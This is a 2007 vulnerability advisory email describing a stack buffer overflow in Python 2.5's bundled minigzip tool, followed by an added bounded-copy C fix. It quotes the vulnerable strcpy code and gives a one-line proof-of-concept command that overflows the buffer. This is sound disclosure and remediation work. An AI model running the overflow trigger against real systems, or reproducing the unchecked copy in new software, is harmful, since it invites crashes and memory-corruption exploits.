From: "starcadi starcadi" <starcadi@gmail.com>
To: news@securiteam.com
Date: Wed, 14 Mar 2007 16:49:36 +0100
Message-ID: <db4e96660703140849n3780625dqdf168acb65b7ea22@mail.gmail.com>
Subject: Python 2.5 (Modules/zlib) minigzip local buffer overflow vulnerability

Description:

The Python source tree bundles several modules; the zlib module (Modules/zlib) includes the minigzip tool (minigzip is a minimal implementation of the gzip utility).

Source error:

The error was found in:
- void file_compress(file, mode)
because strcpy() is used inappropriately: the file name taken from the command line is copied into a fixed-size 1024-byte stack buffer without any length check.

--
#define MAX_NAME_LEN 1024
[..]
void file_compress(file, mode)
    char  *file;
    char  *mode;
{
    local char outfile[MAX_NAME_LEN];   /* "local" is minigzip's alias for static; 1024-byte buffer */
    FILE  *in;
    gzFile out;

    strcpy(outfile, file);              /* unbounded copy of the command-line argument */
    strcat(outfile, GZ_SUFFIX);         /* appends ".gz", again without a bound */
--

The function file_compress() is called from main().

Proof of concept:

If you want to test the vulnerability, try:
$ minigzip `perl -e "print 'A'x1050"`

-- starcadi
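The bounded form of the same outfile construction, as an added example that is neither the advisory's code nor zlib's own minigzip.c: MAX_NAME_LEN and GZ_SUFFIX mirror the real minigzip constants, while build_outfile(), outfile_for() and accepts_name_of_length() are hypothetical helpers written here to show the length check that file_compress() lacks and to exercise it with a constructed name of the proof-of-concept's length.

```c
#include <stdio.h>
#include <string.h>

/* Same constants as zlib's minigzip.c */
#define MAX_NAME_LEN 1024
#define GZ_SUFFIX    ".gz"
#define SUFFIX_LEN   (sizeof(GZ_SUFFIX) - 1)

/* Bounded replacement for the strcpy()/strcat() pair in file_compress():
 * writes "<file>.gz" into out[] and returns 1 if it fits in out_len bytes
 * (terminating NUL included); otherwise empties out[] and returns 0. */
int build_outfile(const char *file, char *out, size_t out_len)
{
    size_t name_len = strlen(file);
    /* The length check the original lacks: name + suffix + NUL must fit. */
    if (out_len < SUFFIX_LEN + 1 || name_len > out_len - SUFFIX_LEN - 1) {
        if (out_len > 0) out[0] = '\0';
        return 0;
    }
    memcpy(out, file, name_len);
    memcpy(out + name_len, GZ_SUFFIX, SUFFIX_LEN + 1); /* copies the NUL */
    return 1;
}

/* Hardened counterpart of file_compress(): refuses over-long names instead
 * of overflowing the stack buffer. Returns the built name (static storage)
 * or NULL when refused; the actual compression loop is omitted here. */
const char *outfile_for(const char *file)
{
    static char outfile[MAX_NAME_LEN];
    if (!build_outfile(file, outfile, sizeof outfile)) {
        fprintf(stderr, "minigzip: file name too long (%zu bytes)\n", strlen(file));
        return NULL;
    }
    return outfile;
}

/* Constructs a name of n 'A' characters (the shape of the advisory's PoC)
 * and reports whether build_outfile() accepts it into a MAX_NAME_LEN buffer. */
int accepts_name_of_length(size_t n)
{
    static char name[4096];
    char out[MAX_NAME_LEN];
    if (n >= sizeof name) return 0;
    memset(name, 'A', n);
    name[n] = '\0';
    return build_outfile(name, out, sizeof out);
}
```

With a 1024-byte buffer the longest accepted name is 1020 bytes (1020 + ".gz" + NUL), so the 1050-byte argument from the proof of concept is refused instead of overrunning the stack.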